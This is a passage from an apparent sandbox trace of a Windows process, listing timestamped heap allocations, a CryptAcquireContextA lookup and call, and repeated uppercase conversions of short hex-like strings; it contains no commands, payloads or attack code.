lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0190.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.205] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0190.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.206] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0190.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.207] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0190.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0190.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.209] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.209] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.210] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0190.210] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.210] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0190.210] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.210] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.210] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.210] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.210] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.211] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.211] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.211] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.211] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.211] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.211] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.212] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.212] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.212] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.212] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.212] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0190.212] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0190.212] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0190.213] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0190.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.214] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.214] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.214] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.214] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.214] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0190.214] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.214] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.215] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.215] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.216] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.216] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.216] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.216] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.216] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.217] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.217] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.217] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.217] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.217] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.217] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.217] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0190.218] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0190.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.218] 